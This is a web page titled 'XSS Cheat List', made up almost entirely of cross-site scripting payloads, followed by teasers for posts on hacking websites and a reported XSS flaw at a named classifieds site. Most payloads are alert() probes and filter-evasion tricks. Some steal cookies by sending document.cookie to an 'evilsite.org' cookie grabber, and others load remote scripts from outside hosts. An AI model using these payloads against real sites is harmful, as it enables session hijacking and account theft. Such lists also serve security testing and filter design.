- <script>alert(1);</script>
- <script>alert('XSS');</script>
- <script src="http://www.evilsite.org/cookiegrabber.php"></script>
- <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
- <scr<script>ipt>alert('XSS');</scr</script>ipt>
- <script>alert(String.fromCharCode(88,83,83))</script>
- <img src=foo.png onerror=alert(/xssed/) />
- <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
- <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
- <marquee><script>alert('XSS')</script></marquee>
- <IMG SRC=\"jav	ascript:alert('XSS');\">
- <IMG SRC=\"jav
ascript:alert('XSS');\">
- <IMG SRC=\"jav
ascript:alert('XSS');\">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- "><script>alert(0)</script>
- <script src=http://yoursite.com/your_files.js></script>
- </title><script>alert(/xss/)</script>
- </textarea><script>alert(/xss/)</script>
- <IMG LOWSRC=\"javascript:alert('XSS')\">
- <IMG DYNSRC=\"javascript:alert('XSS')\">
- <font style='color:expression(alert(document.cookie))'>
- '); alert('XSS
- <img src="javascript:alert('XSS')">
- <script language="JavaScript">alert('XSS')</script>
- [url=javascript:alert('XSS');]click me[/url]
- <body onunload="javascript:alert('XSS');">
- <body onLoad="alert('XSS');"
- [color=red' onmouseover="alert('xss')"]mouse over[/color]
- "/></a></><img src=1.gif onerror=alert(1)>
- window.alert("Bonjour !");
- <div style="x:expression((window.r==1)?'':eval('r=1;
- alert(String.fromCharCode(88,83,83));'))">
- <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
- "><script alert(String.fromCharCode(88,83,83))</script>
- '>><marquee><h1>XSS</h1></marquee>
- '">><script>alert('XSS')</script>
- '">><marquee><h1>XSS</h1></marquee>
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
- <script>var var = 1; alert(var)</script>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
- <IMG SRC='vbscript:msgbox(\"XSS\")'>
- " onfocus=alert(document.domain) "> <"
- <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
- <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
- perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
- perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
- <br size=\"&{alert('XSS')}\">
- <scrscriptipt>alert(1)</scrscriptipt>
- </br style=a:expression(alert())>
- </script><script>alert(1)</script>
- "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- [color=red width=expression(alert(123))][color]
- <BASE HREF="javascript:alert('XSS');//">
- Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- "></iframe><script>alert(123)</script>
- <body onLoad="while(true) alert('XSS');">
- '"></title><script>alert(1111)</script>
- </textarea>'"><script>alert(document.cookie)</script>
- '""><script language="JavaScript"> alert('X \nS \nS');</script>
- </script></script><<<<script><>>>><<<script>alert(123)</script>
- <html><noalert><noscript>(123)</noscript><script>(123)</script>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- '></select><script>alert(123)</script>
- '>"><script src = 'http://www.site.com/XSS.js'></script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- <SCRIPT>document.write("XSS");</SCRIPT>
- a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
- ='><script>alert("xss")</script>
- <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
- <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
- ">/PlanetCreator/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
- ">/PlanetCreator/><script>alert(document.cookie)</script>
- src="http://www.site.com/XSS.js">
- data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
XSS Cheat List
September 4, 2010
0 Comments
Explore More
Critical xss vulnerabilities at classified listings site Ads.com.mm
PlanetCreator has reported another critical XSS Vulnerability on classified listings site Ads.com.mm Cross Site Scripting is a client-side attack where an attacker can craft a malicious link, containing script- code
Ur email can be intercepted!
Top 10 Places Your Email Can Be Intercepted The Internet has radically changed the way we communicate with each other. Email is obviouslyan extremely valuable and ubiquitous form of communication,
How to hack a website? – Tips and tricks
Here are the most common techniques used to hack a website Hacking sites that are least protected by password – By pass authentication It’s the webmaster’s nightmare, hackers accessing the